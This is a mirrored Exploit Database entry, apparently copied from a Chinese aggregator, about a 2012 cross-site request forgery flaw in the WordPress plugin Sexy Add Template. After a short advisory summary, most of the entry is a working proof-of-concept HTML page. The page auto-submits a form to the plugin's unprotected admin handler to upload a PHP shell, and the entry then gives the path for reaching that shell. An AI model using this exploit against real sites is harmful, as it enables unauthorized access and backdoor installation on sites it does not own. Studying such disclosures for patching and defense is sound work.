WordPress Plugin Sexy Add Template – Cross-Site Request Forgery

• Exploit Database
• 102 阅读

• 作者： the_cyber_nuxbie
  日期： 2012-09-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37837/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  source: https://www.securityfocus.com/bid/55666/info   The Sexy Add Template plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.   Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user&apos;s session and gain unauthorized access to the affected application; other attacks are also possible.   Sexy Add Template 1.0 is vulnerable; other versions may also be affected.   ################################################################################# # # [ Information Details ] # - WordPress Plugin Sexy Add Template: # Attacker allow CSRF Upload Shell. # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce". # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title> # </head> # <body onload="document.form0.submit();"> # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" > # <input type="hidden" name="newfile" value="yes" /> # <input type="hidden" type="text" value="shell.php" name="AM_filename"> # <textarea type="hidden" name="AM_file_content"> # [ Your Script Backdoor/Shell ] # &lt;/textarea&gt; # </form> # </body> # </html> # # - Access Shell: # http://www.example.com/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!! # # +#################################################################################